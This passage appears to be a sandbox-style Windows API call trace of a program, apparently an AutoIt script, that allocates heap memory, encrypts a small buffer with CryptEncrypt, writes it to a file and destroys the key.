dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0126.673] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0126.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0126.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.674] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0126.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0126.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0126.675] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xa4a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xa50) returned 1 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0126.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0126.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0126.677] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0126.678] CharLowerBuffW (in: lpsz="byte[2641]", cchLength=0xa | out: lpsz="byte[2641]") returned 0xa [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa51) returned 0x43fd360 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0126.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa4a) returned 0x49aa010 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa4a) returned 0x49aaa68 [0126.679] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0126.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cadd8 [0126.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0126.679] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43fd360*, pdwDataLen=0x144e790*=0xa4a, dwBufLen=0xa50 | out: pbData=0x43fd360*, pdwDataLen=0x144e790*=0xa50) returned 1 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0126.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.680] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0126.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0126.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.680] WriteFile (in: hFile=0x258, lpBuffer=0x43fb458*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x43fb458*, lpNumberOfBytesWritten=0x144f194*=0xa50, lpOverlapped=0x0) returned 1 [0126.681] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0126.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.681] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0126.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0126.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0126.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0126.681] CryptDestroyKey (hKey=0x41ac600) returned 1 [0126.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0126.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0126.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0126.682] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0126.682] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0126.682] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.682] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0126.682] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0126.682] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.871] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.940] TranslateMessage (lpMsg=0x144ec54) returned 0 [0126.940] DispatchMessageW (lpMsg=0x144ec54) returned 0x0 [0126.940] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0126.941] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0126.941] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0126.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0126.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0126.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0126.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0126.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0126.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0126.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0126.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0126.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0126.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0126.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0126.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0126.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0126.942] RtlAllocateHeap 